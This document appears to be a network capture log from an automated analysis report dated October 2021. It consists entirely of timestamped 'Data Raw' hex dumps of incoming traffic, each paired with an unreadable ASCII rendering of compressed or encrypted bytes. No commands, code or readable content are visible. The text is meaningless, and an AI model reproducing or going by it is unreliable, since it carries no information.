                                                                                                                                                                                      2021-10-30 11:52:41 UTC905INData Raw: 48 a2 75 30 2f c7 26 7a 9a 0f 2d d4 e4 a6 11 0b af 41 1b ed ce cd 9f 74 e3 42 7e 33 6d 93 15 02 b2 91 1b 45 99 1b 65 5b 0e b7 41 e6 b0 15 51 1e 76 58 7b 6b 9c 72 92 2c a7 18 31 2e 68 ca 61 0b dc 64 1d a3 c9 c1 d7 2a d8 b2 ae bd a4 8d ba 22 c7 18 25 9b 1a 92 1e e2 00 f7 b8 cf 85 a4 4f a0 d5 06 d9 74 9d 34 2f d7 41 c8 8f 57 a6 b6 4d 98 ad 49 1e 17 09 3b e4 36 7d 18 e3 de 02 9e 2c 52 10 4d 2d 50 da 44 b3 c0 56 6c 86 05 8d c1 f3 80 28 fa 96 5c a4 71 cc 8f 4c a8 42 87 5b 4e e7 5c d8 f3 2c 0c 7d 97 1e 1f fb b7 60 83 e0 f9 82 73 28 50 7a bb 11 3a 38 65 14 39 66 23 59 a1 43 d2 3c 20 cd 2b 36 1f 0f 99 c9 15 d4 aa b1 dc 98 4b fb 8a 05 23 c9 c7 e1 45 d7 20 59 1c e7 10 c8 e6 e4 f3 61 6e e3 24 8e 25 c0 0b 2f 72 2b ce 58 90 59 51 c6 0d fe ac fb 9e 80 2d 29 eb a0 b1 76
                                                                                                                                                                                      Data Ascii: Hu0/&z-AtB~3mEe[AQvX{kr,1.had*"%Ot4/AWMI;6},RM-PDVl(\qLB[N\,}`s(Pz:8e9f#YC< +6K#E Yan$%/r+XYQ-)v
                                                                                                                                                                                      2021-10-30 11:52:41 UTC906INData Raw: a7 e1 2d 4b ea 6f fd a8 18 87 1f b5 64 64 39 5a 6b 6d 0a 88 5e d2 22 c4 7a d3 ca 34 8c 71 6f 44 2b 72 b2 35 02 86 82 c6 7c 03 c0 35 87 e2 20 cb 2c 13 52 c1 90 8b 09 b3 41 80 8c 1d fb 92 9d 9e 48 22 c9 06 3e 40 e9 bc 93 f3 91 c5 90 c9 45 1c 7d 59 1f 2e 94 42 7b c6 64 5d 73 23 4e b9 b6 0b 31 23 14 fb 4e 63 e3 93 35 b7 63 aa c6 39 77 fe 14 d0 b5 53 1e 9f 9e 5d 7b ad 51 b4 99 2c 3f ca 75 65 6d df 46 dd df 72 60 d0 46 23 58 a7 1f b4 2d db bb a5 ef 19 c3 fc c8 25 58 61 2c 21 dc 97 ae a6 18 33 88 31 df 2a 90 8e 75 2b 53 53 97 9d 8e cb 63 f2 66 11 79 43 4c 41 b9 7d 8f 42 ee 41 aa 7a a0 56 32 52 46 b6 e6 eb 6b 2b e1 fd 8d c1 63 e6 c4 e2 b5 5a 62 7c c2 7a 23 d1 17 70 4c 48 6e 21 3a 29 c8 4e 6e ab 38 ec 7e 23 72 1e db 0d d9 67 91 f7 25 3b 25 19 b9 f5 1d 11 6f 40 43
                                                                                                                                                                                      Data Ascii: -Kodd9Zkm^"z4qoD+r5|5 ,RAH">@E}Y.B{d]s#N1#Nc5c9wS]{Q,?uemFr`F#X-%Xa,!31*u+SScfyCLA}BAzV2RFk+cZb|z#pLHn!:)Nn8~#rg%;%o@C
                                                                                                                                                                                      2021-10-30 11:52:41 UTC908INData Raw: 63 4a 5c 76 1c 55 1e ab 52 bd a9 bd 46 d9 66 98 1c da 5f b6 91 c7 80 8d 23 8f 3d d2 34 aa a8 d0 b0 dd be 61 0d 6d 9a 70 ff 58 cc 4c c4 54 ad 94 bc b2 f4 47 35 2f 10 64 57 16 18 fe 24 48 ed d7 51 cf 7f 83 a5 ed 4b b0 3f 9c 4f 42 3c bf c0 e5 64 73 3d 17 58 6a 87 ac 45 58 f6 51 b7 e2 cc 89 76 da ec 7b 3b 23 a1 d0 23 69 1f de bf 93 ec b2 6c e3 8b a0 e6 31 d8 e8 37 bd 22 9d a0 b5 31 60 2d 9c 73 6d d2 fa 81 ac 40 33 1f a9 d2 d1 5a 58 3a 1e 20 95 b7 01 69 22 36 b1 62 66 73 50 b5 6b 8b 09 61 09 85 6a ef 38 72 bb 36 2d c1 d2 f8 3e ea de 5b 54 82 56 d9 c5 88 16 29 4c 33 43 f4 f1 5c 04 77 62 d2 60 a3 6a e7 6c dc 44 2f af 0f 8d 8d af 4d a4 22 66 80 64 4b af 95 c8 21 e4 76 b7 91 98 13 ba 2a d0 15 66 0b d0 d8 0a c9 d8 f4 6e 0c ab 66 c6 ad ad 18 1a b9 ec 54 57 41 17 40
                                                                                                                                                                                      Data Ascii: cJ\vURFf_#=4ampXLTG5/dW$HQK?OB<ds=XjEXQv{;##il17"1`-sm@3ZX: i"6bfsPkaj8r6->[TV)L3C\wb`jlD/M"fdK!v*fnfTWA@
                                                                                                                                                                                      2021-10-30 11:52:41 UTC909INData Raw: ae 35 d9 e2 6b 07 37 d7 4d 16 46 19 0a 54 00 b1 e4 dc 0b 82 6f 10 45 00 94 7e 8b 78 c5 ac 8a 66 66 4e 08 64 ba 01 6b 96 a0 17 b0 0f 22 09 83 48 b9 42 52 15 cd 20 4c 17 4a 89 9b 0d 42 65 f5 17 64 76 be b8 47 3b 48 36 3f 11 d2 0b 79 ca 61 32 ad 8a 2c 35 d0 9b 5b 7f b2 65 7b ed c3 e1 22 b8 f6 ab a0 0e 32 5b a1 d7 36 21 3f f9 c0 29 bb 5d f6 d8 bc 40 f3 18 f5 a9 dc a3 e0 4b 85 9a 28 e0 ad e2 0c e4 85 57 c1 4d d6 22 6d 57 77 90 e8 4e c9 1f 28 e7 43 3f 28 d8 72 61 a8 e3 c0 98 f4 98 f9 71 c5 38 79 1c 49 36 7e 21 51 03 61 cd a7 48 e2 90 ab 45 b2 53 19 9b 1a c9 47 30 e5 ef 61 51 03 0b 0e 6d c6 9b c3 5b 45 f4 53 cc 80 e7 59 d6 0a 18 6e 11 73 3a 95 c0 15 a5 24 1b 0a 83 40 b9 80 f0 a2 a2 4d 5a b0 69 1c 0b 0d 92 25 16 78 af 7e 3e f0 7c 92 73 30 fe e1 3f c8 9f 96 e5 e2
                                                                                                                                                                                      Data Ascii: 5k7MFToE~xffNdk"HBR LJBedvG;H6?ya2,5[e{"2[6!?)]@K(WM"mWwN(C?(raq8yI6~!QaHESG0aQm[ESYns:$@MZi%x~>|s0?
                                                                                                                                                                                      2021-10-30 11:52:41 UTC910INData Raw: 39 98 db a2 1d 37 dd 5a ef 05 bc 27 e0 47 38 c8 8b b4 5e 71 c1 62 ed 1a 91 85 f8 44 0d 1c ba fa 59 74 58 0e 6e 9a 96 e0 31 16 d2 e3 8f 27 5f 78 0a a6 4f d2 62 b1 96 9e 96 b1 28 53 99 76 2f da e8 d7 c2 2d b5 15 d2 02 4d 72 0b f7 be f2 e6 6b 91 57 c4 c7 45 14 4a 44 6c ed b2 a9 02 34 53 c2 66 4f 23 6d ed 8a 02 8d 6b 65 e4 36 ac 2f 63 73 71 9b d6 0e 64 1d 90 3b f2 f0 67 21 8f 3c 92 6f 2d df 30 11 4d 63 4f 5d 0d 6b 26 f0 31 8c d3 92 d9 6f 2d ea 1e 38 2a 39 67 e1 c8 23 30 1b 25 ec 82 6e 32 63 65 97 64 f7 71 8b 3e db a8 5b 1c f5 4c e9 5e ec 94 36 8f 1f 20 d9 e5 36 a6 73 d3 00 ca 59 21 57 9d e2 fa d8 44 0e c2 c7 b7 0c 68 82 d7 b2 04 5e be e9 ca c5 05 ad 5c 6d 7a 71 ab 3b ef 53 4c 0d 31 35 ac 83 c0 60 74 0e be cf 33 72 9f 1e 20 7f 01 d6 18 2d c8 70 12 c4 17 62 8f
                                                                                                                                                                                      Data Ascii: 97Z'G8^qbDYtXn1'_xOb(Sv/-MrkWEJDl4SfO#mke6/csqd;g!<o-0McO]k&1o-8*9g#0%n2cedq>[L^6 6sY!WDh^\mzq;SL15`t3r -pb
                                                                                                                                                                                      2021-10-30 11:52:41 UTC912INData Raw: 6f dd dd ee 36 a7 77 a7 9e 72 52 77 ea a9 27 75 37 3d f9 44 f3 b7 f1 d9 cf 7e b1 fb d4 a7 bf 20 f4 f9 ee 03 1f fc 78 f7 ee f7 7c b8 bb e4 b2 cb cc bb ec 74 45 ac df 17 e2 13 2e 2f d4 50 7c 1d 70 00 0a b6 56 b1 a6 fa ed ce ba 4d f7 b0 c7 3f 54 13 ee 07 b8 16 c5 d1 15 57 92 2e ff fa c5 dd a5 e7 5f d0 5d 79 c9 65 72 34 50 9c e1 7e 53 16 6a 5e 3c a1 40 03 e7 db bf b8 86 ac 48 03 f7 22 0d 85 98 17 6a 2c ca 50 a4 05 f9 0a fa a4 9d 17 6a 56 f0 f9 93 36 bf bf f2 de 4b d2 31 63 6c 73 81 22 ff 65 2f f9 fd ee 21 0f 7b 86 59 46 30 9a 76 7e 9f 73 30 74 5e 6e e3 10 d6 46 39 9c 65 83 2b e7 af 9a df c2 93 0f d7 22 58 94 55 31 9b 4a 51 a6 68 06 d5 2a dd 8c 65 6c 32 2b 44 c9 ad a7 91 66 2e 42 3c 37 71 be ba ce f3 d7 b9 d9 23 a7 54 e8 88 e5 5e 36 85 a9 be 4b f6 21 24 ff 54
                                                                                                                                                                                      Data Ascii: o6wrRw'u7=D~ x|tE./P|pVM?TW._]yer4P~Sj^<@H"j,PjV6K1cls"e/!{YF0v~s0t^nF9e+"XU1JQh*el2+Df.B<7q#T^6K!$T
                                                                                                                                                                                      2021-10-30 11:52:41 UTC913INData Raw: 37 90 4a 7b f1 be 34 e8 41 0f b8 47 f7 27 7f f0 dc ee e7 7e e6 59 7c f2 b7 d5 b8 f3 9d 6e d7 fd ec 4f 7d 6f f7 a7 7f f8 f3 dd 43 1e 7c 2f b3 8e 23 5d d6 42 2c 1c 84 b4 90 c8 c5 85 17 66 a9 10 b1 27 44 f0 5d 5f b0 fb a0 03 bb 1b dd f2 d4 ee b4 b3 cf ec 76 1f 7c a0 2c 89 ad 85 51 fd f7 6b 5c 17 f0 50 94 29 c5 b5 72 ca b1 5e ac f1 fe 4b c2 da 0b e7 75 0d 5a 82 7c ae 79 71 06 1c 74 e0 81 dd 83 1e 78 4f d3 66 20 a7 89 62 05 f7 b4 bd 6d c4 36 35 4d a3 d7 4a 76 35 cd 4c b5 1e 36 d4 0f c7 6b 50 51 ef 18 94 82 93 af 47 e0 66 e3 5c 61 c1 8f c9 e4 6e b7 18 fa a9 ab df 75 6e 94 8d ac b1 6e d9 4e 44 83 50 54 1d 3a 2e 6d 0b 24 29 04 c5 f8 f9 68 b4 4a 26 08 d3 59 3d 2a 46 4f b5 8a b1 4b 81 da 20 60 24 8d 5d db bc e0 fd 72 0f 72 d8 d1 a1 7e f7 09 af 29 f8 5d 56 49 19 3d
                                                                                                                                                                                      Data Ascii: 7J{4AG'~Y|nO}oC|/#]B,f'D]_v|,Qk\P)r^KuZ|yqtxOf bm65MJv5L6kPQGf\anunnNDPT:.m$)hJ&Y=*FOK `$]rr~)]VI=
                                                                                                                                                                                      2021-10-30 11:52:41 UTC914INData Raw: ba 93 ce bd 5b b7 bb 7a 9a e6 b8 e1 e9 a7 74 37 39 f3 36 1c 2f 9f 98 89 2d 73 2d 90 b4 aa 57 9d f3 22 e5 39 c2 eb b2 43 65 b5 47 68 fc 72 f8 58 ea 62 4d df da 2c 8b 34 97 51 78 29 97 02 4a 6c 2c d0 84 f4 2d ce 50 7c b9 9d 14 8b af 18 a3 ba ff 2d 9b b7 e1 07 cf b2 3f ed 03 fd d9 b2 cf 06 f2 69 a1 a6 05 9b 7e 68 ae 72 3c 4d 43 a1 86 be ae cf 38 ed d4 93 ba 9f fc b1 ef 32 6d b5 73 44 81 96 81 e4 98 80 3f e2 9b ef d7 fd e1 ef fd 6c 77 f3 d3 6f 2a fa be 89 d3 4e bd 09 df 0a 7d f4 23 1f 60 96 12 b8 be 79 79 93 ac 48 0b 6f f7 81 f4 e9 90 16 69 2c 48 24 e6 fa 8c 83 e4 97 d0 5b 4a 11 c4 c2 cc 89 c5 18 3e 62 03 1f b5 91 e5 2b 8d 52 8c ad 93 17 b4 e9 2d 4f ae ab df 53 6d bd a5 af f6 4a fa 79 66 62 05 98 e2 df a6 d5 c0 e7 d9 7d d3 43 ef 6b da 0a 18 e8 77 fb b1 fe 40
                                                                                                                                                                                      Data Ascii: [zt796/-s-W"9CeGhrXbM,4Qx)Jl,-P|-?i~hr<MC82msD?lwo*N}#`yyHoi,H$[J>b+R-OSmJyfb}Ckw@
                                                                                                                                                                                      2021-10-30 11:52:41 UTC915INData Raw: a1 66 b4 db de 06 c5 5b 9f a2 7f 23 00 1f 90 8b 0f c7 1d 3b 4b e0 19 a2 88 67 3c fd 31 dd 93 f6 a3 4f e5 af f1 f8 c7 3e 58 8a cc 27 98 66 67 95 9d 5a e9 3a 97 6b 5e 0b 35 14 1a 42 28 3c 84 be 91 9e a8 01 07 1f 7a 70 77 f3 db df ca be 5d 20 7f cb 80 eb ad 22 8d 6b c4 2f b1 cf 4f 24 51 ac e5 fb a8 41 f4 8c 7c 96 d5 e7 5b 89 1d fc 90 e4 33 67 fe c3 ca b3 9f 9d df f6 af 31 d5 4f 26 c3 78 83 1e 96 dd ad 56 c1 c2 01 6d 0c f2 7a 23 f7 63 de 92 27 96 28 bd 32 e1 c7 9c 64 68 4f 4d e0 b2 1b 84 d3 12 8c be f7 1c 0a 53 0a db 34 ea e3 02 3d be ce 7b 84 c7 25 2e 02 23 68 a0 42 9e ec 29 46 39 91 74 37 04 9f a3 d6 1b 68 4f 71 ee c4 11 d7 22 47 cb a6 e8 5b 32 f8 ca a9 27 02 0e 97 6e 3c 98 24 8a 4c 90 93 a8 94 75 87 ad 12 25 95 55 d5 65 cd 9b 58 e0 93 1d 39 36 97 e9 cc 1c
                                                                                                                                                                                      Data Ascii: f[#;Kg<1O>X'fgZ:k^5B(<zpw] "k/O$QA|[3g1O&xVmz#c'(2dhOMS4={%.#hB)F9t7hOq"G[2'n<$Lu%UeX96
                                                                                                                                                                                      2021-10-30 11:52:41 UTC917INData Raw: 6f a8 e4 aa a7 83 9f 28 0e d8 e4 6a 0e 34 0b 71 29 84 50 2c 3d ec 09 df 0c f7 6c fc cb cb 5e 13 9e 6a 69 e1 a4 a4 6f 4f fa 53 29 fa 8d e3 89 58 7a 8b 94 76 d3 23 67 ac 11 73 b4 63 bd 28 f3 02 ad 28 ec c8 71 ec 94 1f 7d f7 3b 77 3b e5 c5 6d 2e 2e fa 8f f7 75 d7 5d 71 45 c8 21 27 97 f5 87 17 5e f0 c3 6e 7c a3 ee a8 05 1f cc 7a e5 d7 2f ea 2e 78 f7 07 6d 2e 3a 46 8c 3d cd 87 76 b3 c1 07 dd 62 d8 77 24 da 75 6e e2 56 ce 63 a9 e7 ab fc 28 a0 18 2e bf 6c 4f f7 e9 4f 7e b6 7b ed ab df d0 9d 7a f3 9b 76 27 ca f8 97 00 c5 d1 07 3e f0 71 4d 9e d3 8e 40 03 51 2c fd e2 cf ff 50 77 d8 a1 87 a8 79 0d bc e0 45 ff b7 fb 83 3f 7a 41 f7 07 7f fc c2 ee 2d 6f 7b 4f f7 85 2f 7c b9 bb f8 92 cb f8 a4 aa 06 5e f0 2f 11 df 17 be f8 95 ee ad 6f 7f 4f f7 92 97 bd 96 fc c2 8b 2e e9
                                                                                                                                                                                      Data Ascii: o(j4q)P,=l^jioOS)Xzv#gsc((q};w;m..u]qE!'^n|z/.xm.:F=vbw$unVc(.lOO~{zv'>qM@Q,PwyE?zA-o{O/|^/oO.
                                                                                                                                                                                      2021-10-30 11:52:41 UTC918INData Raw: 22 cd 9e a6 f9 df f0 c5 22 0d 6b 26 3f 94 09 e7 33 50 1f fd ff f6 23 55 b1 b5 10 8f 79 cc 83 25 a9 64 15 2a 9e 34 05 d1 31 7f 94 06 cf 31 87 12 44 b1 f1 28 a9 69 65 78 fb 21 4a 08 c6 d0 af 8b 2d 58 88 ee 2d 30 db 14 78 85 c2 eb 94 fb a2 2d 74 63 3a 3c 90 4d 77 99 9b 06 9a 44 39 a2 52 15 38 60 81 f4 9c eb 13 c0 d7 f6 b8 89 83 64 1b fe 64 45 6d 88 b5 77 bf 28 9b 1d 39 22 57 a1 6f 17 0e 40 76 24 89 41 41 0f d2 be 86 e6 7a 0b e4 f5 9a 47 c9 0e 1c a0 87 cf 37 b5 06 0d 71 4e e6 1d 05 17 09 0b 69 8b c9 05 93 8d 5c 7d 6a 73 d2 a7 69 c7 de 61 fc 73 7b a6 70 c6 43 ef c7 0f 62 c4 a8 e5 75 96 e3 54 0e 5d e7 82 62 05 1c a4 1e 55 dc a6 24 1b 6c 46 da 46 b7 a5 f0 02 4a 0b b1 4c 5e 14 a4 e2 0c 5c 62 bd 00 8b 4f dc 68 13 9d b1 b4 8b 0c dd 0a 3c 16 68 20 b1 f9 13 b4 54 98
                                                                                                                                                                                      Data Ascii: ""k&?3P#Uy%d*411D(iex!J-X-0x-tc:<MwD9R8`ddEmw(9"Wo@v$AAzG7qNi\}jsias{pCbuT]bU$lFFJL^\bOh<h T
                                                                                                                                                                                      2021-10-30 11:52:41 UTC919INData Raw: cb f7 48 b1 46 9e 63 2e af 0a 38 2d b6 f0 04 4e 38 8a b1 64 13 7f 2a c8 b2 5d db 69 7c a4 a5 7f 67 b7 43 ae 6d be e5 89 22 ed 9a ab ad 48 d3 a7 69 7c bb 53 e6 e8 45 ac bf c0 01 ca 26 fa b2 43 9b 8f 70 96 ce 3a f3 d6 dd 2d d7 7c 9a e6 f8 fe ef fb 2f 26 b5 a1 a3 44 df 42 c6 56 c5 d2 a6 de 5d eb 5a 70 df 26 90 fb 29 91 8b 28 f1 e8 4f 11 c7 71 35 fd 6e 57 03 99 c5 69 28 76 a6 17 be a0 6b 94 c8 4a b2 27 25 7b 36 25 94 67 94 69 c2 70 be 91 cc da 24 d9 d5 c4 62 8c 94 cf 61 2d d0 40 76 fd 93 c3 a7 71 e0 2a 59 1c 35 95 dd ee 50 5b 8d 6c 64 3b 15 07 11 a6 bf 6d f0 71 45 02 f0 ba 1d 06 54 1c 2a a2 d4 14 6e ab a9 86 77 02 a4 1b 09 f7 82 28 d8 aa c3 74 c2 fd d6 7f 9a e6 c0 53 b5 9b 9f 73 47 99 24 8a 04 2b 54 c8 65 96 3c 79 55 c7 d8 39 73 b3 51 87 8f f6 cc 93 9d 3e 68
                                                                                                                                                                                      Data Ascii: HFc.8-N8d*]i|gCm"Hi|SE&Cp:-|/&DBV]Zp&)(Oq5nWi(vkJ'%{6%gip$ba-@vq*Y5P[ld;mqET*nw(tSsG$+Te<yU9sQ>h
                                                                                                                                                                                      2021-10-30 11:52:41 UTC921INData Raw: ff c5 fb c9 4f 7e b6 bb f4 b2 3d fa 59 69 28 d0 ec 49 9a ff 73 85 af 09 96 25 ad 0c 14 30 ee 87 31 76 ac bf e7 99 4f 36 69 b3 78 f2 93 da 9f 37 39 7d 56 09 6c c0 7e ad 38 cd c3 fc c8 8c d8 cb 02 e2 00 41 a2 06 98 97 88 f7 41 ca 6e c7 e6 36 12 43 ac ad 6d 2d bb db a0 53 86 55 ef f3 2a ab 9e 7d e0 d0 cd 66 9b 65 28 48 ed d3 c0 f9 c6 53 cf 4e bc 20 26 78 4c ba 96 8d 63 cb 6f 77 9a df 75 6e a5 8c 9d 49 66 a7 44 ae 72 89 b6 7d de bc b6 0a 3e a6 62 5c c5 90 da e3 c3 eb 88 a0 3c 30 90 ea f0 c2 66 0a 0f b8 5a 86 81 15 0d 48 03 95 5d 96 af eb 0e 3e e1 b8 ee e8 db de 42 b4 cd e3 8c 87 dc b7 3b f0 80 03 52 a1 a2 df 00 00 d2 e2 c6 0b b1 5c b8 79 1c 78 b6 6b 8c da a0 2f 45 51 70 89 ec 4f d4 5c 47 6e d7 5d ce 7f 90 df a0 30 9e 2c eb f8 53 c1 26 fd fa 78 31 64 92 ec 72
                                                                                                                                                                                      Data Ascii: O~=Yi(Is%01vO6ix79}Vl~8AAn6Cm-SU*}fe(HSN &xLcowunIfDr}>b\<0fZH]>B;R\yxk/EQpO\Gn]0,S&x1dr
                                                                                                                                                                                      2021-10-30 11:52:41 UTC922INData Raw: f9 cb de ca 76 e0 ed e3 27 3e f9 87 f4 3c 71 12 3b 38 e0 9c 48 62 b0 09 38 96 29 84 26 f7 bc e7 9d bb ff f9 f3 3f 64 da d6 e1 fe 0f 7a 3a 9f 14 6e 02 a3 73 2c 97 a3 07 75 4f 04 4d a1 31 00 3d 07 d4 e1 6e 55 79 d7 25 78 af 75 d9 38 82 92 2c 88 b2 6b dc 9b 23 fb f5 7e 6d 12 1d 50 69 8a fd a8 41 65 ee db 28 d6 45 98 af 10 cf c0 a8 87 73 50 45 3d 47 29 25 57 b6 41 48 72 b0 93 9b e2 56 6f 6f 5a 4f b7 9f 80 e4 a9 1d a3 68 e5 28 30 94 6b 6c 01 89 1c 10 56 60 3e 06 9a ec f8 a8 14 6a 26 13 75 5c cb 59 0f 80 9a ed dc 93 6e 2c aa 90 c7 9b 4e e2 42 37 7b ca a3 ba 1b 6c d1 db 9e 11 6f 7f d1 2b bb f7 bd fe 8d c5 17 73 c7 42 0d 6f 2b 80 63 6c 7c 8b 41 9b 09 fc b3 b5 bd 88 d2 42 ed 39 7f f9 5b f4 ce c5 2b be ef 67 52 a1 e6 45 1a b8 3e 11 cb 85 1a fa 42 7e 11 29 83 80 cc
                                                                                                                                                                                      Data Ascii: v'><q;8Hb8)&?dz:ns,uOM1=nUy%xu8,k#~mPiAe(EsPE=G)%WAHrVooZOh(0klV`>j&u\Yn,NB7{lo+sBo+cl|AB9[+gRE>B~)
                                                                                                                                                                                      2021-10-30 11:52:41 UTC923INData Raw: a3 90 80 3a be 26 dd 0d 42 c3 52 70 02 8a c9 cb 2f bf c2 b4 79 38 e5 a6 b9 60 1d ef f5 fa 89 f7 bc f7 c3 dd ff f7 bc 97 a7 c2 cc d8 22 b4 8e 05 e0 d6 9a 1e 78 ff bb cb 2f 0a 37 11 69 19 7e e9 97 ff 88 df 79 fb da 7f 7c 93 59 e6 e3 19 df fe b8 ee b0 ea 7b 5e 23 74 6c 3e c2 3e dc 33 1c 91 81 3c 53 31 04 93 c9 2e 92 1a 07 c8 20 a2 6a da 13 9b 42 13 21 f1 40 5e 6c f5 68 a7 dc 1d 5a 76 a1 3a 87 93 df 43 b2 ad d2 45 06 68 03 25 c1 c8 90 45 91 82 9d e8 c5 95 79 53 00 59 94 c1 8a 88 04 3f a5 c7 79 fc e0 a8 ec 73 d4 7a 06 7a 13 b2 c5 18 8e db 9b b0 31 92 e6 03 e7 82 c0 0e ae 4d 50 2d 55 2a f7 1b 28 c1 46 4d 50 04 3b 6c a9 f4 ee 53 ad dc 75 dd 89 72 a3 58 8a f3 3f f4 b1 ee 82 8f 7f 8a 32 0a b5 2b 2e 5a f6 d9 4d 07 4a 91 76 5b 7b aa 86 17 d2 b2 10 cb c5 5a ab 48 ab
                                                                                                                                                                                      Data Ascii: :&BRp/y8`"x/7i~y|Y{^#tl>>3<S1. jB!@^lhZv:CEh%EySY?yszz1MP-U*(FMP;lSurX?2+.ZMJv[{ZH
                                                                                                                                                                                      2021-10-30 11:52:41 UTC925INData Raw: 19 b4 b8 50 fb 1a 3e fe 44 1a 4e d2 3c b4 5a a6 f3 42 a8 0d f3 8c 07 f1 e9 df 12 e0 bb 30 53 ba d4 c5 f4 68 f6 57 e0 6d ec ef f9 fe 9f eb fe f5 8d ff 61 96 79 f0 35 d1 75 09 18 57 0b 7c f3 c3 ee d7 dd 74 e1 db ee c0 2f ff ca 1f 9b 54 e2 65 7f f7 3a 93 e6 e3 a9 df f2 08 7d a2 ec 87 d7 88 d7 06 02 06 c0 30 8b a9 e3 5a b6 61 e4 55 ac 29 c3 2c 7e c1 8a 6c 16 82 26 d8 e0 86 d5 b8 86 53 a2 ac d7 7d 20 b6 cd af 01 3d 3f db 6b ae be af 22 0c c1 c0 bc 46 2d a4 7b b1 55 65 ae c7 5f a5 cb fb 75 a9 95 c8 bd c8 30 94 c3 96 cc 71 14 51 16 54 6a 1b 63 41 7d 1f 46 3a 36 da 04 34 65 73 8c d6 95 7e be 3e 62 6c 83 b0 08 05 99 2b 60 ce f8 86 62 f0 0b be c2 f3 53 c7 ce a6 a1 22 e1 07 42 55 d1 dc 6e dc 7d ae 0e e1 46 e7 ae f8 34 ed f3 e1 69 5a 98 d1 aa 4f d5 6e f9 80 7b a6 17
                                                                                                                                                                                      Data Ascii: P>DN<ZB0ShWmay5uW|t/Te:}0ZaU),~l&S} =?k"F-{Ue_u0qQTjcA}F:64es~>bl+`bS"BUn}F4iZOn{
                                                                                                                                                                                      2021-10-30 11:52:41 UTC926INData Raw: 3c 65 d9 bf 84 5f 77 cd b5 dd db 7e e5 0f ba cb ce ff 9a e6 09 7d 98 02 81 3f 27 9e 7d 87 ee 76 4f 7b ac d9 e6 e1 9a ab ae ea fe e9 67 7f ad db 73 e1 c5 f6 5d 8c cc 8e 74 3d e8 9a ca 26 02 5e 78 ef f2 cc a7 75 27 9c 75 5b fa e6 e0 93 7f fe a2 ee e2 0f 7c 54 5f c0 45 c7 c9 9a 7f cb b2 dc 8c 54 5d 2d 01 8c 89 d0 b1 38 e2 c9 ef ed 09 61 2a 25 41 b8 e5 f6 1d 38 6d 52 6c 48 41 70 a3 85 df bd fa 85 df fa 13 cb 01 cd f2 51 54 01 eb 79 d8 19 b7 ee 6e b0 e0 2b a4 f6 7c f1 bc ee c2 77 e4 4f b9 4f c7 c4 73 03 38 5e 3c 68 72 f4 ae bd ae db 7d d8 61 dd ee 23 0e 27 1d 72 d3 93 bb dd 87 1f 66 81 ab e1 92 4f 7d ae fb c0 ff 79 61 77 d5 35 d7 74 57 ca b9 78 a5 f0 2b 84 5f 61 7c 4f c5 49 d7 4a 9c 8c 05 f1 57 81 cb f8 ae 12 9b 7e 6d 99 9c 73 a2 83 1e fe c8 07 74 df fd dd f3
                                                                                                                                                                                      Data Ascii: <e_w~}?'}vO{gs]t=&^xu'u[|T_ET]-8a*%A8mRlHApQTyn+|wOOs8^<hr}a#'rfO}yaw5tWx+_a|OIJW~mst
                                                                                                                                                                                      2021-10-30 11:52:41 UTC927INData Raw: 8b 00 b1 e0 60 36 51 d9 e5 26 58 14 62 06 ca b5 cf 76 6a e9 03 76 92 ec f4 29 58 1f 2d db 10 86 e7 0c cc 9c 5f 04 5c 43 34 80 7e 48 b4 2c a5 79 98 13 39 14 83 d7 13 82 5d 56 51 54 83 3f 22 3d ba 75 87 70 88 54 7d 97 6c 78 9a 76 37 18 17 e1 cb ef 7c 6f b7 c7 8a 00 a6 f4 bd 32 cb 9d 01 79 d5 a7 6a 37 7b d0 7d f5 85 16 3a 48 92 f9 0b b0 fe 0d 5b 7c d2 a6 be 2b be f6 75 34 9f 8d 23 6e 73 8b 6e e7 01 78 19 e7 25 c8 01 83 27 9d c8 b2 74 11 10 a2 82 9d 62 19 28 50 3d 9b 4d e7 ce 8c ce d4 48 d9 7d 07 df e2 34 f2 b9 40 a1 c6 0b 59 9a eb 05 1b 2f db 6c 89 d6 f9 28 5b b5 72 a4 dc 36 0d 70 fd 64 6a 8f df d1 5d f4 ae f7 76 5f 79 e5 6b a5 f8 5f fe 1b ff 11 a7 9f d2 1d 7a c2 0d d3 f9 90 88 85 5b 69 c3 df a4 25 92 7e c1 c5 ac 24 b9 40 00 f8 e7 3f 7f 1e bf 16 6a 09 ee 71
                                                                                                                                                                                      Data Ascii: `6Q&Xbvjv)X-_\C4~H,y9]VQT?"=upT}lxv7|o2yj7{}:H[|+u4#nsnx%'tb(P=MH}4@Y/l([r6pdj]v_yk_z[i%~$@?jq
                                                                                                                                                                                      2021-10-30 11:52:41 UTC929INData Raw: ae 92 1b f2 35 17 5f c2 0b b1 77 31 5a 1f f4 b5 fa 9b 89 94 b7 75 b5 37 f2 c6 30 ef d7 6d e0 17 fe db db bb ab be be ec a3 5c 80 9b 3c f0 de 3c f6 b1 20 2b de fa ac 8b 35 23 2f d0 48 26 bb 01 7f cc be 04 07 1c b0 bb 7b e2 e3 1f 62 5a 04 b3 8e 82 ff ef 21 64 5d af 01 cf d0 cf f2 c4 27 3c 84 df 32 b0 04 ef 7d ef 87 99 ca 56 26 65 ad f9 12 a0 4d 93 64 a7 84 de 7c ab 7c 22 03 c9 6e fb e7 49 a1 f6 91 81 0f 7d 1d c3 77 7d e7 13 42 ae 2c 64 9b ef 75 cb 16 25 a0 18 b7 53 15 d7 22 fc fd d7 89 27 1e 27 d2 32 fc cd 0b 5e c9 f6 40 ee c5 f7 d3 78 c1 0b 5f 65 d2 7c 3c f4 a1 f7 e9 6e 76 33 7c c6 66 d5 cb dc 4e d7 40 b3 8b 64 6c 0f 20 3d 7d 72 6e b0 cb 8c 7b 2f c2 b8 4f b2 40 1c ee 63 21 44 a5 24 32 8d b6 38 ec 10 1d ec 08 02 a7 ac 52 f6 71 1f 64 d7 32 07 3c 0c 3c b7 ee
                                                                                                                                                                                      Data Ascii: 5_w1Zu70m\<< +5#/H&{bZ!d]'<2}V&eMd||"nI}w}B,du%S"''2^@x_e|<nv3|fN@dl =}rn{/O@c!D$28Rqd2<<
